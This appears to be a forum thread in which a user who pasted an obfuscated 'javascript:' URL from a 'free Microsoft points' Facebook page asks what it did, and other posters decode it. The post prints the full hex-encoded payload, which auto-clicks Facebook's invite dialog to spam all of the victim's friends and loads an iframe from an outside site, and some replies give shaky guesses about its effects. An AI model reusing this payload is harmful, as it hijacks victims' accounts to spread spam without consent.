I have a problem that hopefully someone here can help me with. Since I don't know any Javascript, I thought I would check here.Through a "get free microsoft points" facebook page I was suggested, I tried to copy and paste the following code into my browser's address bar. It appeared that nothing happened, but my friend who knows a little javascript told me that
the code is nasty stuff that tried to access my computer. I really have two major questions.

1. What if anything did me entering the code do to my computer?

2. How do I fix it?

Before I give the code, little bit about my system. I tried it with both firefox and IE. I am on windows vista 32 bit. I have trend micro anti virus and ran it, nothing suspicious was seen.



javascript:var _0x8a13=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C",
"\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x62\x6F\x64\x79" ,"\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3C\x61\x20\ x69\x64\x3D\x22\x73\x75\x67\x67\x65\x73\x74\x22\x20\x68\x72\x65\x66\x3D\x22 \x23\x22\x20\x61\x6A\x61\x78\x69\x66\x79\x3D\x22\x2F\x61\x6A\x61\x78\x2F\x73 \x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67 \x2E\x70\x68\x70\x3F\x63\x6C\x61\x73\x73\x3D\x46\x61 \x6E\x4D\x61\x6E\x61\x67\x65\x72\x26\x61\x6D\x70\x3B\x6E\x6F\x64\x65\x5F\x69\x64\x3D\x31\x32\x31\x32 \x31\x33\x35\x33\x37\x39\x32\x34\x32\x35\x38\x22\x20 \x63\x6C\x61\x73\x73\x3D\x22\x20\x70\x72\x6F\x66\x69\x6C\x65\x5F\x61\x63\x74 \x69\x6F\x6E\x20\x61\x63\x74\x69\x6F\x6E\x73\x70\x72\x6F\x5F\x61\x22\x20\x72\x65\x6C\x3D\x22\x64\x69 \x61\x6C\x6F\x67\x2D\x70\x6F\x73\x74\x22\x3E\x53\x75 \x67\x67\x65\x73\x74\x20\x74\x6F\x20\x46\x72\x69\x65\x6E\x64\x73\x3C\x2F\x61
\x3E","\x73\x75\x67\x67\x65\x73\x74","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73 ","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\ x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\ x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\
x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68 \x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x3C\x69\x66\x72\x61\x6D\ x65\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x64\x72\x65\ x61\x6D\x74\x72\x69\x63\x6B\x2E\x6E\x65\x74\x2F\x6D\x73\x70\x2E\x68\x74\x6D\x6C\x22\
x20\x73\x74\x79\x6C\x65\x3D\x22\x77\x69\x64\x74\x68\x3A\x20\x38\x32\x30\x70\x78\x3B\ x20\x68\x65\x69\x67\x68\x74\x3A\x20\x36\x30\x30\x70\x78\x3B\x22\x20\x66\x72\x61\x6D\ x65\x62\x6F\x72\x64\x65\x72\x3D\x30\x20\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x22\ x6E\x6F\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E"];var variables=[_0x8a13[0],_0x8a13[1]
,_0x8a13[2],_0x8a13[3],_0x8a13[4],_0x8a13[5],_0x8a13[6],_0x8a13[7],_0x8a13[8],_0x8a13[9] ,_0x8a13[10],_0x8a13[11],_0x8a13[12],_0x8a13[13]]; void (document[variables[2]] (variables[1])[variables[0]]=variables[3]);var ss=document[variables[2]](variables[4]) ;var c=document[variables[6]](variables[5]);c[variables[8]](variables[7],true,true); void ss[variables[9]](c); void setTimeout(function (){fs[variables[10]]();} ,4000);
void setTimeout(function (){SocialGraphManager[variables[13]](variables[11],variables[12]);} ,5000); void (document[variables[2]](variables[1])[variables[0]]=_0x8a13[14]);



Thanks for everyone's help.

you weren't hacked, js has no effect on anything outside of the page that called it.
the code was obscurified to make it harder to read, but if you put in your URL bar javascript:alert("\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C") you will see innerHTML, you can do this for the rest of the code to see what it actually said. The code didn't do anything because there is a syntax error in it.

I don't think it's a virus, per se.

Just a way to conceal what they are doing to get you to buy into their stuff.

FWIW, the "hidden strings" in there (the ones that are encoded as "\x69\x6E\x6E\x65\x72..." etc.) are actually these strings:

innerHTML
app4949752878_body
getElementById
<a id="suggest" href="#" ajaxify="/ajax/social_graph/invite_dialog.php?class=FanManager&node_id=121213537924258" class=" profile_action actionspro_a" rel="dialog-post">Suggest to Friends</a>
suggest
MouseEvents
createEvent
click
initEvent
dispatchEvent
select_all
sgm_invite_form
/ajax/social_gsubmitDialog
<iframe src="http://www.dreamtrick.net/msp.html" style="width: 820px; height: 600px;" frameborder=0 scrolling="no"></iframe>

Hmmmm...maybe I'm wrong.

It looks like it waits 4 seconds and then does a "select_all" (that is, grabs everything on the page) and then, one second later, submits the stuff it just selected to some place.

So I *THINK* it is trying to grab all the contents of the page it is installed on and send it off somewhere so that somebody can try to get whatever data they can find there for their own purposes.

I don't see any way it got anything "off your computer" other than whatever was on the page you were then viewing. If the page you were viewing had your username and password on it, then maybe it swiped them. So go change your password.

The code didn't do anything because there is a syntax error in it.

??? I didn't see a syntax error. What did you see?

Thanks Old Pedant. What happened to the guy who actually ran that javascript is exactly what you described the javascript does. He said that it selected all the options on the page and then automatically suggested that page to all of his facebook friends.

Thank you for the quick response! I can stop worrying so much now about it.

Key words "a little". Your antivirus and firewalls would be throwing up alerts. If the code wasn't put there by you then its possible someone injected it in some way on the server.

Since I don't know any Javascript, I thought I would check here.Through a "get free microsoft points" facebook page I was suggested, I tried to copy and paste the following code into my browser's address bar.

Alas, there is one born every minute. I hope that you have learned something from this - never, ever do such a thing. You seem to be a ripe target for phishing and you were lucky that you did not introduce a virus into your machine. The Javascript code could have invited you to click on a link to get "Free Microsoft Points", see nude girls, extend your virile member or whatever.

...The Javascript code could have invited you to click on a link to get "Free Microsoft Points", see nude girls, extend your virile member or whatever.

Call me immature, but that made me chuckle. :thumbsup:

Call me immature, but that made me chuckle. :thumbsup:

Pretty immature if you ask me. What are you, 4?

:p